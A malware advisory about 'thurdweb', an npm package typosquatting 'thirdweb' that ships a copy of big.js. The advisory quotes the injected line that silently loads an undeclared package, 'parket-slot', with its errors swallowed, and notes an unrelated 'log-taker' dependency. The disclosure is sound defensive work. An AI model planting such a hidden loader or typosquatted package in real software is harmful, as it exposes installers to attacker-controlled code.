MAL-2026-6345
Malicious code in thurdweb (npm)
Details
## Source: amazon-inspector (775ff15f4a1314978d4cfed1e97c6c9ac8621d8ddeed93160c25aa3681f73cc7)

Package name `thurdweb` is a one-character substitution of the popular web3 SDK `thirdweb`, but the shipped source is a copy of MikeMcl/big.js (arbitrary-precision decimal arithmetic); the public API has no relation to the impersonated target.

The library file (`big.js` / `big.mjs`, lines 605-608) contains an injected top-level block that fires on `require('thurdweb')` / `import 'thurdweb'`:

```js
try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }
```

`parket-slot` is not declared in `package.json` `dependencies`, and the entire call is wrapped in an empty try/catch that silently swallows every error. `package.json` additionally declares `log-taker@^0.0.9` as a runtime dependency, which is unrelated to decimal arithmetic and shares the same nondescriptive shape.

Any installer who imports this package transitively loads attacker-controlled code from sibling packages whose contents the publisher controls and can mutate independently of this tarball; the silent error handler hides the failure from the consumer.
Affected packages
No fixed version published yet for thurdweb (npm). Pin to a known-safe version or switch to an alternative.